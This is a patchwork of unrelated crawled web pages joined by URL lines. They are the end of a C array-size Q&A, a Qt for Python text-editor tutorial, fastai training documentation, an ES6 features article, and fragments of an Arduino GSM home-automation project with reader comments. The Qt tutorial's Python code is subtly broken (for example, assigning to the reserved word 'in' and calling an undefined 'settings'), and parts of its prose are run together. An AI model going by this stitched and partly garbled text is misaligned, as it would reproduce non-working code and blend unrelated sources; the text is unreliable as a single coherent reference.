foo(&y); /* ok */

If the function is supposed to be able to operate on any size of array, then you will have to provide the size to the function as additional information.

Answer #6:

#include <stdio.h>

#define NUM_DAYS 5
typedef int days_t[ NUM_DAYS ];
#define SIZEOF_DAYS ( sizeof( days_t ) )

int main()
{
    days_t days;
    days_t *ptr = &days;
    printf( "SIZEOF_DAYS: %zu\n", SIZEOF_DAYS );
    printf( "sizeof(days): %zu\n", sizeof(days) );
    printf( "sizeof(*ptr): %zu\n", sizeof(*ptr) );
    printf( "sizeof(ptr): %zu\n", sizeof(ptr) );
    return 0;
}

Output:
SIZEOF_DAYS: 20
sizeof(days): 20
sizeof(*ptr): 20
sizeof(ptr): 4

Answer #7: My solution to this problem is to save the length of the array into a struct Array as meta-information about the array.

#include <stdio.h>
#include <stdlib.h>

struct Array {
    int length;
    double *array;
};
typedef struct Array Array;

Array* NewArray(int length)
{
    /* Allocate the memory for the struct Array */
    Array *newArray = (Array*) malloc(sizeof(Array));
    /* Accept only non-negative lengths */
    newArray->length = (length > 0) ? length : 0;
    newArray->array = (double*) malloc(newArray->length * sizeof(double));
    return newArray;
}

void SetArray(Array *structure, int length, double* array)
{
    structure->length = length;
    structure->array = array;
}

void PrintArray(Array *structure)
{
    if (structure->length > 0) {
        int i;
        printf("length: %d\n", structure->length);
        for (i = 0; i < structure->length; i++)
            printf("%g\n", structure->array[i]);
    }
    else
        printf("Empty Array. Length 0\n");
}

int main()
{
    int i;
    Array *negativeTest, *days = NewArray(5);
    double moreDays[] = {1,2,3,4,5,6,7,8,9,10};
    for (i = 0; i < days->length; i++)
        days->array[i] = i+1;
    PrintArray(days);
    SetArray(days, 10, moreDays);
    PrintArray(days);
    negativeTest = NewArray(-5);
    PrintArray(negativeTest);
    return 0;
}

But you have to take care to set the right length for the array you want to store, because there is no way to check this length, as explained at length above. Hope you learned something from this post.
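Not part of the original answers – as a small addendum, if C++17 is available, std::size from <iterator> gives the element count of an array (and of containers) and refuses to compile when handed a plain pointer, which avoids the macro pitfalls mentioned above. A minimal sketch:

#include <cstdio>
#include <iterator>   // std::size, C++17

int main()
{
    int days[] = {1, 2, 3, 4, 5};
    int *ptr = days;
    printf("%zu\n", std::size(days));        /* 5: number of elements */
    /* printf("%zu\n", std::size(ptr)); */   /* would not compile: a pointer carries no size */
    (void)ptr;
    return 0;
}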
Follow Programming Articles for more!
https://programming-articles.com/how-to-find-the-size-of-a-pointer-pointing-to-an-array-answered/
CC-MAIN-2022-40
en
refinedweb
Application Example

The Application example shows how to implement a standard GUI application with menus, toolbars, and a status bar. The example itself is a simple text editor program built around QPlainTextEdit. Nearly all of the code for the Application example is in the MainWindow class, which inherits QMainWindow. QMainWindow provides the framework for windows that have menus, toolbars, dock windows, and a status bar. The application provides File, Edit, and Help entries in the menu bar, each with its own popup menu. In the class definition we reimplement closeEvent() to detect when the user attempts to close the window, and warn the user about unsaved changes. In the private slots section, we declare slots that correspond to menu entries, as well as a mysterious documentWasModified() slot. Finally, in the private section of the class, we have various members that will be explained in due time.

MainWindow Class Implementation

from PySide2.QtGui import *

def __init__(self):
    QMainWindow.__init__(self)
    textEdit = QPlainTextEdit()
    setCentralWidget(textEdit)
    createActions()
    createMenus()
    createToolBars()
    createStatusBar()
    readSettings()
    connect(textEdit.document(), SIGNAL("contentsChanged()"),
            self, SLOT("documentWasModified()"))
    setCurrentFile("")
    setUnifiedTitleAndToolBarOnMac(True)

In the constructor, we start by creating a QPlainTextEdit widget as a child of the main window (the this object). Then we call createActions(), createMenus(), createToolBars(), createStatusBar() and readSettings() to set up the rest of the window.

def closeEvent(self, event):
    if maybeSave():
        writeSettings()
        event.accept()
    else:
        event.ignore()

def newFile(self):
    if maybeSave():
        textEdit.clear()
        setCurrentFile("")

The newFile() slot is invoked when the user selects File|New from the menu. We call maybeSave() to save any pending changes and, if the user accepts to go on, we clear the QPlainTextEdit and call the private function setCurrentFile() to update the window title and clear the windowModified flag.

def open(self):
    if maybeSave():
        fileName = QFileDialog.getOpenFileName(self)
        if not fileName.isEmpty():
            loadFile(fileName)

The open() slot is invoked when the user clicks File|Open. We pop up a QFileDialog asking the user to choose a file. If the user chooses a file (i.e., fileName is not an empty string), we call the private function loadFile() to actually load the file.

def save(self):
    if curFile.isEmpty():
        return saveAs()
    else:
        return saveFile(curFile)

def saveAs(self):
    fileName = QFileDialog.getSaveFileName(self)
    if fileName.isEmpty():
        return False
    return saveFile(fileName)

In saveAs(), we start by popping up a QFileDialog asking the user to provide a name. If the user clicks Cancel, the returned file name is empty, and we do nothing.

def about(self):
    QMessageBox.about(self, tr("About Application"),
        tr("The <b>Application</b> example demonstrates how to "
           "write modern GUI applications using Qt, with a menu bar, "
           "toolbars, and a status bar."))

The application's About box is done using one statement, with the QMessageBox.about() static method.

def documentWasModified(self):
    setWindowModified(textEdit.document().isModified())

The documentWasModified() slot is invoked each time the text in the QPlainTextEdit changes because of user edits. We call setWindowModified() to make the title bar show that the file was modified. How this is done varies on each platform.

def createActions(self):
    Act = QAction(QIcon(":/images/new.png"), tr("&New"), self)
    Act.setShortcuts(QKeySequence.New)
    Act.setStatusTip(tr("Create a new file"))
    connect(Act, SIGNAL("triggered()"), self, SLOT("newFile()"))

    openAct = QAction(QIcon(":/images/open.png"), tr("&Open..."), self)
    openAct.setShortcuts(QKeySequence.Open)
    openAct.setStatusTip(tr("Open an existing file"))
    connect(openAct, SIGNAL("triggered()"), self, SLOT("open()"))
    ...
aboutQtAct = QAction(tr("About &Qt"), self) aboutQtAct.setStatusTip(tr("Show the Qt library's About box")) connect(aboutQtAct, SIGNAL("triggered()"), qApp, SLOT("aboutQt()")) The createActions()private function, which is called from the MainWindowconstructor, creates QActions and populates the menus and two toolbars. The code is very repetitive, so we show only the actions corresponding to File|New, File|Open, and Help|About Qt. A QActionis an object that represents one user action, such as saving a file or invoking a dialog. An action can be put in a QMenuor a QToolBar, or both, or in any other widget that reimplementscan be created by passing a parent QObjector by using one of the convenience functions of QMenu, QMenuBaror QToolBar. We create the actions that are in a menu as well as in a toolbar parented on the window to prevent ownership issues. For actions that are only in the menu, we use the convenience function addAction(). The code above contains one more idiom that must be explained. For some of the actions, we specify an icon as a QIconto the QActionconstructor. We usefilePlainTextEditcontains selected text. We disable them by default and connect the copyAvailable()signal to the setEnabled()slot, ensuring that the actions are disabled when the text editor has no selection. Just before we create the Help menu, we call addSeparator(). This has no effect for most widget styles (e.g., Windows and macOS styles), but for some styles this makes sure that Help is pushed to the right side of the menu bar.def createStatusBar(self): statusBar().showMessage(tr("Ready")) statusBar()returns a pointer to the main window’s QStatusBarwidget. Like with menuBar(), the widget is automatically created the first time the function is called.def readSettings(self): settings("Trolltech", "Application Example") pos = settings.value("pos", QPoint(200, 200)).toPoint() size = settings.value("size", QSize(400, 400)).toSize() resize(size) move(pos) The readSettings()function is called from the constructor to load the user’s preferences and other application settings. The QSettingsclass provides a high-level interface for storing settings permanently on disk. On Windows, it uses the (in)famous Windows registry; on macOS , it uses the native XML-based CFPreferences API; on Unix/X11, it uses text files. The QSettingsconstructor takes arguments that identify your company and the name of the product. This ensures that the settings for different applications are kept separately. We use value()to extract the value of the geometry setting. The second argument to value()is optional and specifies a default value for the setting if there exists none. This value is used the first time the application is run. We use saveGeometry()and Widget::restoreGeometry() to save the position. They use an opaque QByteArrayto store screen number, geometry and window state.def writeSettings(self): settings = QSettings("Trolltech", "Application Example") settings.setValue("pos", pos()) settings.setValue("size", size()) The writeSettings()function is called from closeEvent(). Writing settings is similar to reading them, except simpler. 
The arguments to the QSettings constructor must be the same as in readSettings().

def maybeSave(self):
    if textEdit.document().isModified():
        ret = QMessageBox.warning(self, tr("Application"),
                tr("The document has been modified.\n"
                   "Do you want to save your changes?"),
                QMessageBox.Save | QMessageBox.Discard | QMessageBox.Cancel)
        if ret == QMessageBox.Save:
            return save()
        elif ret == QMessageBox.Cancel:
            return False
    return True

The maybeSave() function is called to save pending changes. If there are pending changes, it pops up a QMessageBox giving the user the option to save the document. The options are Save, Discard, and Cancel. The Save button is made the default button (the button that is invoked when the user presses Return) using the Default flag; the Cancel button is made the escape button (the button that is invoked when the user presses Esc) using the Escape flag. The maybeSave() function returns True in all cases, except when the user clicks Cancel or saving the file fails. The caller must check the return value and stop whatever it was doing if the return value is False.

def loadFile(self, fileName):
    file = QFile(fileName)
    if not file.open(QFile.ReadOnly | QFile.Text):
        QMessageBox.warning(self, tr("Application"),
                tr("Cannot read file %1:\n%2.")
                .arg(fileName)
                .arg(file.errorString()))
        return

    in = QTextStream(file)
    QApplication.setOverrideCursor(Qt.WaitCursor)
    textEdit.setPlainText(in.readAll())
    QApplication.restoreOverrideCursor()

    setCurrentFile(fileName)
    statusBar().showMessage(tr("File loaded"), 2000)

In loadFile(), we use QFile and QTextStream to read in the data. The QFile object provides access to the bytes stored in a file. We start by opening the file in read-only mode. The Text flag makes sure that, on Windows, the "\r\n" end-of-line sequence is converted to "\n" when reading. We then use a QTextStream object to read in the data. QTextStream automatically converts the 8-bit data into a Unicode QString and supports various encodings. If no encoding is specified, QTextStream assumes the file is written using the system's default 8-bit encoding (for example, Latin-1; see codecForLocale() for details).

Since the call to readAll() might take some time, we set the cursor to be WaitCursor for the entire application while it goes on. At the end, we call the private setCurrentFile() function, which we'll cover in a moment, and we display the string "File loaded" in the status bar for 2 seconds (2000 milliseconds).

def saveFile(self, fileName):
    file = QFile(fileName)
    if not file.open(QFile.WriteOnly | QFile.Text):
        QMessageBox.warning(self, tr("Application"),
                tr("Cannot write file %1:\n%2.")
                .arg(fileName)
                .arg(file.errorString()))
        return False

    out = QTextStream(file)
    QApplication.setOverrideCursor(Qt.WaitCursor)
    out << textEdit.toPlainText()
    QApplication.restoreOverrideCursor()

    setCurrentFile(fileName)
    statusBar().showMessage(tr("File saved"), 2000)
    return True

Saving a file is similar to loading one. We use QSaveFile to ensure all data are safely written and existing files are not damaged should writing fail. We use the Text flag to make sure that on Windows, "\n" is converted into "\r\n" to conform to the Windows convention.

def setCurrentFile(self, fileName):
    curFile = fileName
    textEdit.document().setModified(False)
    setWindowModified(False)

    if curFile.isEmpty():
        shownName = "untitled.txt"
    else:
        shownName = strippedName(curFile)
    setWindowTitle(tr("%1[*] - %2").arg(shownName).arg(tr("Application")))

The setCurrentFile() function is called to reset the state of a few variables when a file is loaded or saved, or when the user starts editing a new file (in which case fileName is empty).
We update the curFile variable, clear the modified flag and the associated QWidget.windowModified flag, and update the window title to contain the new file name (or untitled.txt). The strippedName() function call around curFile in the setWindowTitle() call shortens the file name to exclude the path. Here's the function:

def strippedName(self, fullFileName):
    return QFileInfo(fullFileName).fileName()

The main() Function

The main() function uses a command-line parser to check whether some file argument was passed to the application and loads it via MainWindow::loadFile().

The Resource File

The images used by the Application example are listed in application.qrc, an XML-based file format that lists files on the disk (a sketch of the file is shown at the end of this section, since the original snippet was not preserved here). The .png files listed in the application.qrc file are files that are part of the Application example's source tree. Paths are relative to the directory where the application.qrc file is located (the mainwindows/application directory). The resource file must be mentioned in the application.pro file so that qmake knows about it. qmake will produce make rules to generate a file called qrc_application.cpp that is linked into the application. This file contains all the data for the images and other resources as static C++ arrays of compressed binary data. See The Qt Resource System for more information about resources.
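The original page's application.qrc and application.pro snippets were not preserved in this extract. As an illustration only, a minimal resource file referencing the two icons used by the actions above, together with the corresponding qmake line, could look like this (the exact file list of the real example may differ):

<RCC>
    <qresource>
        <file>images/new.png</file>
        <file>images/open.png</file>
    </qresource>
</RCC>

# in application.pro, so that qmake compiles the resources in:
RESOURCES = application.qrc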
https://doc.qt.io/qtforpython/overviews/qtwidgets-mainwindows-application-example.html
CC-MAIN-2020-05
en
refinedweb
The fastai library structures its training process around the Learner class, whose object binds together a PyTorch model, a dataset, an optimizer, and a loss function; the entire Learner object then allows us to launch training.

basic_train defines this Learner class, along with the wrapper around the PyTorch optimizer that the library uses. It defines the basic training loop that is used each time you call the fit method (or one of its variants) in fastai. This training loop is very bare-bones and has very few lines of code; you can customize it by supplying an optional Callback argument to the fit method.

callback defines the Callback class and the CallbackHandler class that is responsible for the communication between the training loop and the Callback's methods. The CallbackHandler maintains a state dictionary able to provide each Callback object all the information of the training loop it belongs to, putting any imaginable tweak of the training loop within your reach.

callbacks implements each predefined Callback class of the fastai library in a separate module. Some modules deal with scheduling the hyperparameters, like callbacks.one_cycle, callbacks.lr_finder and callback.general_sched. Others allow special kinds of training like callbacks.fp16 (mixed precision) and callbacks.rnn. The Recorder and callbacks.hooks are useful to save some internal data generated in the training loop.

train then uses these callbacks to implement useful helper functions. Lastly, metrics contains all the functions and classes you might want to use to evaluate your training results; simpler metrics are implemented as functions while more complicated ones are subclasses of Callback. For more details on implementing metrics as Callback, please refer to creating your own metrics.

from fastai.vision import *
path = untar_data(URLs.MNIST_SAMPLE)
data = ImageDataBunch.from_folder(path)

URLs.MNIST_SAMPLE is a small subset of the classic MNIST dataset containing the images of just 3's and 7's for the purpose of demo and documentation here. Common datasets can be downloaded with untar_data - which we will use to create an ImageDataBunch object.

model = simple_cnn((3,16,16,2))
learn = Learner(data, model)
learn.fit(1)

learn.metrics=[accuracy]
learn.fit(1)

cb = OneCycleScheduler(learn, lr_max=0.01)
learn.fit(1, callbacks=cb)

learn.recorder.plot_lr(show_moms=True)

Many of the callbacks can be used more easily by taking advantage of the Learner extensions in train. For instance, instead of creating OneCycleScheduler manually as above, you can simply call Learner.fit_one_cycle:

learn.fit_one_cycle(1)

Note that if you're training a model for one of our supported applications, there's a lot of help available to you in the application modules. For instance, let's use cnn_learner (from vision) to quickly fine-tune a pre-trained Imagenet model for MNIST (not a very practical approach, of course, since MNIST is handwriting and our model is pre-trained on photos!).

learn = cnn_learner(data, models.resnet18, metrics=accuracy)
learn.fit_one_cycle(1)
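The page above only shows the built-in OneCycleScheduler. Purely as an illustration (not from the original docs), a minimal custom Callback, assuming the fastai v1 API and the learn object created above, can be passed to fit() in the same way; the epoch and smooth_loss arguments are supplied by the CallbackHandler's state dictionary mentioned earlier:

from fastai.callback import Callback

class PrintEpochCallback(Callback):
    "Toy callback: report the smoothed training loss after every epoch."
    def on_epoch_end(self, epoch, smooth_loss, **kwargs):
        # values come from the CallbackHandler's state dictionary
        print(f"epoch {epoch}: smooth loss {float(smooth_loss):.4f}")

learn.fit(1, callbacks=[PrintEpochCallback()])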
https://docs.fast.ai/training.html
CC-MAIN-2020-05
en
refinedweb
ECMAScript 2015, or ES6, introduced many changes to JavaScript. JavaScript ES6 brought new syntax and awesome new features to make your code more modern and more readable.

Originally published by Adesh at zeptobook.com

What is ES6?

ES6 introduced many great features like arrow functions, template strings, classes, destructuring, modules… and many more. Let's dive into the reasons for its popularity.

Reason 1: You can write it now for all browsers

ES6 is now supported in all major browsers. Here is the list of browser support for ES6. Photo courtesy: W3Schools.com

Reason 2: Fully backward compatible

ES6 remains backward compatible with the JavaScript running in current and older browsers or environments. JavaScript, being a rich ecosystem, has hundreds of packages on the package manager (NPM), and it has been adopted worldwide. To make sure ES5 JavaScript packages always work in the presence of ES6, it was decided to make ES6 100% backward compatible. This has one major benefit: you can start writing ES6 alongside your existing JavaScript ES5. It also helps you to slowly embrace new features and adopt the aspects of ES6 that can make your life easier as a programmer. To support full backward browser compatibility, there is a very cool project called Babel. Babel is a JavaScript transpiler that converts edge JavaScript into plain old ES5 JavaScript that can run in any browser. For more details about Babel, please see the links below: Babel Usage Guide. How to setup Babel?

Reason 3: ES6 is faster in some cases

I am going to share one performance benchmark for ES6. ES6 performed better than, or at least matched, the same functions written in ES5. You can visit this link as well to check the ES6 performance benchmark: Performance of ES6 features relative to the ES5 baseline, in operations per second.

Reason 4: Doing more while writing less code

As said above, you can now do a lot more while writing less code in ES6, and you can write cleaner and more concise code. Here are a few examples of ES6 code syntax.

No need to write the function and return keywords anymore. This is one of the most awesome features of ES6; it makes your code look more readable, more structured and more modern, and you don't need to write the old syntax anymore. An arrow function expression has a shorter syntax than a function expression and does not have its own this, arguments, super, or new.target. One of the benefits of arrow functions is having either a concise body or the usual block body. In a concise body, only an expression is given on a single line, with an implicit return value. In a block body, you must use an explicit return keyword, normally with curly braces { return .. }.

var func = x => x * x;                  // concise body with implicit return keyword
var func = (x, y) => { return x + y; }; // block body with explicit return keyword

ES6 will throw an error if there is an improper line break in an arrow function. Ideally, it should be a single-line statement. If you want to use it as a multi-line statement, use the proper curly braces or brackets.
var func = (a, b, c)
  => 1;          // SyntaxError: a line break before => is not allowed

// Use proper syntax
var func = (a, b, c) => (
  1
);               // no SyntaxError thrown

//ES6
odds = evens.map(v => v + 1)

//ES5
odds = evens.map(function (v) { return v + 1; });

A simple and smart way of passing default values for function parameters. Functions can now be defined with default parameter values. If you omit an argument, the missing or undefined value is initialized with the default parameter. Default parameters prevent you from getting an undefined error: if you forget to pass the argument, you won't get undefined, because the parameter already has a default defined in the function signature.

//ES6
function f (a, b = 10, c = 20) {
  return a + b + c
}
f(5) === 35

//ES5
function f (a, b, c) {
  if (b === undefined) b = 10;
  if (c === undefined) c = 20;
  return a + b + c;
};
f(5) === 35;

An easy way to pass rest parameters, with three dots (…) before the parameter name. With the help of a rest parameter, you can pass an indefinite number of arguments as an array. A function's last parameter can be prefixed with ..., which causes all remaining arguments to be placed within a standard JavaScript array. Only the last parameter can be a rest parameter. One of the major differences between the arguments object and a rest parameter is that a rest parameter is a real array instance, whereas the arguments object is not. This means that you can apply array methods like sort, map, forEach or pop on it directly.

//ES6
function f (a, b, ...z) {
  return (a + b) * z.length
}
f(10, 20, "ZeptoBook", true, 5) === 90

//ES5
function f (a, b) {
  var z = Array.prototype.slice.call(arguments, 2);
  return (a + b) * z.length;
};
f(10, 20, "ZeptoBook", true, 5) === 90;

Concatenating strings in a cleaner way. Template literals are string literals that allow embedded expressions. String interpolation is one of the interesting features of ES6. Prior to ES6, we used double or single quotes to concatenate string expressions, which sometimes looked weird and buggy. In ES6, template literals are enclosed by the back-tick (`) character instead of single or double quotes. You can find the back-tick at the top left of your keyboard, under the esc key. Template literals have placeholders with a $ sign and curly braces, like ${expression}. The $ sign is mandatory for interpolation.

//ES6
var product = {
  quantity: 20,
  name: "Macbook",
  unitprice: 1000
}
var message = `I want to buy ${product.name},
for a total of ${product.unitprice * product.quantity} bucks?`

//ES5
var product = {
  quantity: 20,
  name: "Macbook",
  unitprice: 1000
}
var message = "I want to buy " + product.name + ",\n" +
  "for a total of " + (product.unitprice * product.quantity) + " bucks?";

A shorter syntax for defining object properties. Prior to ES6, every object property needed to be either a getter-setter or a key-value pair. This has completely changed in ES6: there is now a concise way of defining object properties, so you can define complex object properties in a much cleaner way.

//ES6
var x = 0, y = 0
obj = { x, y }

//ES5
var x = 0, y = 0;
obj = { x: x, y: y };

Support for method notation in object property definitions. In the same way as discussed above, we can now define object methods concisely and in a much cleaner way.
//ES6
obj = {
  add (a, b) { … },
  multi (x, y) { … },
}

//ES5
obj = {
  add: function (a, b) { … },
  multi: function (x, y) { … },
};

Reason 5: New built-in methods in ES6

There is a new function to assign the enumerable properties of one or more source objects into a destination object.

//ES6
var dest = { quux: 0 }
var src1 = { foo: 1, bar: 2 }
var src2 = { foo: 3, baz: 4 }
Object.assign(dest, src1, src2)
dest.quux === 0
dest.foo === 3
dest.bar === 2
dest.baz === 4

//ES5
var dest = { quux: 0 };
var src1 = { foo: 1, bar: 2 };
var src2 = { foo: 3, baz: 4 };
Object.keys(src1).forEach(function(k) {
  dest[k] = src1[k];
});
Object.keys(src2).forEach(function(k) {
  dest[k] = src2[k];
});
dest.quux === 0;
dest.foo === 3;
dest.bar === 2;
dest.baz === 4;

There are new functions to find an element in an array.

//ES6
[ 10, 30, 40, 20 ].find(x => x > 30) // 40
[ 10, 30, 40, 20 ].findIndex(x => x > 30) // 2

//ES5
[ 10, 30, 40, 20 ].filter(function (x) { return x > 30; })[0]; // 40
// no such function in ES5

There is new string-repeating functionality as well.

//ES6
" ".repeat(5 * depth)
"bar".repeat(3)

//ES5
Array((5 * depth) + 1).join(" ");
Array(3 + 1).join("bar");

New string functions to search for a sub-string:

//ES6
"zepto".startsWith("epto", 1) // true
"zepto".endsWith("zept", 4) // true
"zepto".includes("zep") // true
"zepto".includes("ept", 1) // true
"zepto".includes("ept", 2) // false

//ES5
"zepto".indexOf("epto") === 1; // true
"zepto".indexOf("zept") === (4 - "zept".length); // true
"zepto".indexOf("ept") !== -1; // true
"zepto".indexOf("ept", 1) !== -1; // true
"zepto".indexOf("ept", 2) !== -1; // false

There are new functions for checking non-numbers and finite numbers.

//ES6
Number.isNaN(50) === false
Number.isNaN(NaN) === true
Number.isFinite(Infinity) === false
Number.isFinite(-Infinity) === false
Number.isFinite(NaN) === false
Number.isFinite(50) === true

//ES5
var isNaN = function (n) {
  return n !== n;
};
var isFinite = function (v) {
  return (typeof v === "number" && !isNaN(v) && v !== Infinity && v !== -Infinity);
};
isNaN(50) === false;
isNaN(NaN) === true;
isFinite(Infinity) === false;
isFinite(-Infinity) === false;
isFinite(NaN) === false;
isFinite(50) === true;

There is a built-in function to check whether an integer is in the safe range.

//ES6
Number.isSafeInteger(50) === true
Number.isSafeInteger(9007199254740992) === false

//ES5
function isSafeInteger (n) {
  return (
    typeof n === 'number' &&
    Math.round(n) === n &&
    -(Math.pow(2, 53) - 1) <= n &&
    n <= (Math.pow(2, 53) - 1)
  );
}
isSafeInteger(50) === true;
isSafeInteger(9007199254740992) === false;

There is a mathematical function to truncate a floating-point number to its integral part, completely dropping the fractional part.

//ES6
console.log(Math.trunc(12.7)) // 12
console.log(Math.trunc(0.4)) // 0
console.log(Math.trunc(-0.4)) // -0

//ES5
function mathTrunc (x) {
  return (x < 0 ? Math.ceil(x) : Math.floor(x));
}
console.log(mathTrunc(12.7)) // 12
console.log(mathTrunc(0.4)) // 0
console.log(mathTrunc(-0.4)) // -0

Summary

JavaScript surely isn't a perfect language; it has various imperfections. Over recent years, developers have gained more and more experience with JavaScript ES5, which has led to enhancements. ES6 brings many engrossing features that were not seen in previous versions like ES5.
https://morioh.com/p/y7BwGAvnzblM
CC-MAIN-2020-05
en
refinedweb
React Native

This tutorial demonstrates how to add user login to a React Native application using Auth0.

Install Dependencies

How to install the React Native Auth0 module.

yarn
yarn add react-native-auth0

npm
npm install react-native-auth0 --save

Additional iOS step: Install the Module Pod

CocoaPods is the package management tool for iOS that the React Native framework uses to install itself into your project. For the iOS native module to work with your iOS app you must first install the library Pod. If you're familiar with older React Native SDK versions, this is similar to what was called linking a native module. The process is now simplified: change directory into the ios folder and run pod install.

cd ios
pod install

The first step in adding authentication to your application is to provide a way for your users to log in. The fastest, most secure, and most feature-rich way to do this with Auth0 is to use the hosted login page.

Integrate Auth0 in your Application

Configure Android

In the file android/app/src/main/AndroidManifest.xml you must make sure the activity you are going to receive the authentication on has a launchMode value of singleTask and that it declares the following intent filter (see the React Native docs for more information):

<intent-filter>
  <action android:name="android.intent.action.VIEW" />
  <category android:name="android.intent.category.DEFAULT" />
  <category android:name="android.intent.category.BROWSABLE" />
  <data
    android:scheme="${applicationId}"
    android:host="YOUR_DOMAIN"
    android:pathPrefix="/android/${applicationId}/callback" />
</intent-filter>

The sample app declares this inside the MainActivity like this:

<activity
  android:name=".MainActivity"
  android:launchMode="singleTask">
  <intent-filter>
    <action android:name="android.intent.action.MAIN" />
    <category android:name="android.intent.category.LAUNCHER" />
  </intent-filter>
  <intent-filter>
    <action android:name="android.intent.action.VIEW" />
    <category android:name="android.intent.category.DEFAULT" />
    <category android:name="android.intent.category.BROWSABLE" />
    <data
      android:scheme="${applicationId}"
      android:host="YOUR_DOMAIN"
      android:pathPrefix="/android/${applicationId}/callback" />
  </intent-filter>
</activity>

Configure iOS

In the file ios/<YOUR PROJECT>/AppDelegate.m add the following:

#import <React/RCTLinkingManager.h>

- (BOOL)application:(UIApplication *)application
            openURL:(NSURL *)url
  sourceApplication:(NSString *)sourceApplication
         annotation:(id)annotation
{
  return [RCTLinkingManager application:application
                                openURL:url
                      sourceApplication:sourceApplication
                             annotation:annotation];
}

Next you will need to add a URLScheme using your App's bundle identifier. Inside the ios folder open the Info.plist and locate the value for CFBundleIdentifier:

<key>CFBundleIdentifier</key>
<string>$(PRODUCT_BUNDLE_IDENTIFIER)</string>

then below it register a URL type entry using the value of CFBundleIdentifier as the value for CFBundleURLSchemes:

<key>CFBundleURLTypes</key>
<array>
  <dict>
    <key>CFBundleTypeRole</key>
    <string>None</string>
    <key>CFBundleURLName</key>
    <string>auth0</string>
    <key>CFBundleURLSchemes</key>
    <array>
      <string>$(PRODUCT_BUNDLE_IDENTIFIER)</string>
    </array>
  </dict>
</array>

Take note of this value as you'll be using it to define the callback URLs below. If desired, you can change it using Xcode in the following way:

- Open the ios/<YOUR PROJECT>.xcodeproj file or run xed ios in a Terminal from the app root.
- Open your project's or desired target's Build Settings tab and find the section that contains "Bundle Identifier".
- Replace the "Bundle Identifier" value with your desired application's bundle identifier name.

For additional information please read the React Native docs.

iOS Callback URL

{PRODUCT_BUNDLE_IDENTIFIER}://YOUR_DOMAIN/ios/{PRODUCT_BUNDLE_IDENTIFIER}/callback

Remember to replace {PRODUCT_BUNDLE_IDENTIFIER} with your actual application's bundle identifier name.

Android Callback URL

{YOUR_APP_PACKAGE_NAME}://YOUR_DOMAIN/android/{YOUR_APP_PACKAGE_NAME}/callback

Remember to replace {YOUR_APP_PACKAGE_NAME} with your actual application's package name.
iOS logout URL

{PRODUCT_BUNDLE_IDENTIFIER}://YOUR_DOMAIN/ios/{PRODUCT_BUNDLE_IDENTIFIER}/callback

Remember to replace {PRODUCT_BUNDLE_IDENTIFIER} with your actual application's bundle identifier name.

Android logout URL

{YOUR_APP_PACKAGE_NAME}://YOUR_DOMAIN/android/{YOUR_APP_PACKAGE_NAME}/callback

Remember to replace {YOUR_APP_PACKAGE_NAME} with your actual application's package name.

Add Authentication with Auth0

Universal login is the easiest way to set up authentication in your application. We recommend using it for the best experience, best security and the fullest array of features.

First, import the Auth0 module and create a new Auth0 instance.

import Auth0 from 'react-native-auth0';

const auth0 = new Auth0({
  domain: 'YOUR_DOMAIN',
  clientId: 'YOUR_CLIENT_ID'
});

Then present the hosted login screen, like this:

auth0
  .webAuth
  .authorize({scope: 'openid profile email'})
  .then(credentials =>
    // Successfully authenticated
    // Store the accessToken
    this.setState({ accessToken: credentials.accessToken })
  )
  .catch(error => console.log(error));

Upon successful authentication the user's credentials will be returned, containing an access_token, an id_token and an expires_in value.
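The log-out code appears to have been truncated from this extract. As an illustration only, a minimal log-out sketch using the react-native-auth0 webAuth.clearSession() call might look like the following; clearing an accessToken field in component state is an assumption about your own app, not part of the SDK:

auth0
  .webAuth
  .clearSession()
  .then(() => {
    // Browser session cleared; also drop the token your app keeps in state
    this.setState({ accessToken: null });
  })
  .catch(error => console.log(error));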
https://auth0.com/docs/quickstart/native/react-native/00-login
CC-MAIN-2020-05
en
refinedweb
Mobile. Working Explanation. Circuit Components. Circuit Description.

#include <LiquidCrystal.h>
LiquidCrystal lcd(6,7,8,9,10,11);
#define Fan 3
#define Light 4
#define TV 5
int temp=0,i=0;
int led=13;
char str[15];

After this, serial communication is initialized at 9600 bps and directions are given to the used pins.

void setup()
{
  lcd.begin(16,2);
  Serial.begin(9600);
  pinMode(led, OUTPUT);
  pinMode(Fan, OUTPUT);
  pinMode(Light, OUTPUT);
  pinMode(TV, OUTPUT);
  lcd.setCursor(0,0);
  lcd.print("GSM Control Home");
  lcd.setCursor(0,1);
  lcd.print(" Automaton ");
  delay(2000);
  lcd.clear();
  lcd.print("Circuit Digest");
}

Feb 06, 2016 Is this Code really working sir? I would like to ask for the complete code this sir, i'm interested in making this project sir! Please Send me the the Code sir!
Feb 07, 2016 yes, this code will work fine. uploaded code on the website is complete. copy it and go ahead.
Feb 09, 2016 Is it okay sir to use 5v-4 channels relay instead of 5v SPDT relay and a ULN2003 driver? Cause i've been trying it using your code and a relay module but it doesn't work(still without an Output connected to it).
Apr 02, 2017 Hi Sadam, I have a similar project where i would like to detect water leakage and send sms to my phone, im using use an Analogue water sensor, arduino uno and a gsm shield, would you help me with a code
May 22, 2017 Sir, I can't see where mobile number was used in code.
Nov 11, 2017 this program will not reply anything so mobile number is not necessary
Mar 17, 2018 hi saddam this project in proteus doesnt work when i dail the number in virtual terminal no responce
Nov 24, 2019 hey i'm sorry but i have make the same with the project with serial and it go fine. with gsm sim908 it don't work i have use tx e rx 0/1 but also other pins with 7/8 can you help mi please thank's
Feb 10, 2016 what is this? is this code need any modification E:\tim\tim.ino: In function 'void serialEvent()': E:\tim\tim.ino:54:25: warning: deprecated conversion from string constant to 'char*' [-Wwrite-strings] if(Serial.find("#A.")); ^
Feb 11, 2016 I think you should remove Semicolon from the "if statement"'.
Feb 11, 2016 Thanks to your code sir! It's working but the initial state of the relay module i used is ON, and all of the commands are inverted. How can i correct this sir?
Feb 11, 2016 Glad that your project is finally worked. You must have connected NC terminal of Relay to the AC appliances, instead of NO, just swap them. Check this article for Relay working.
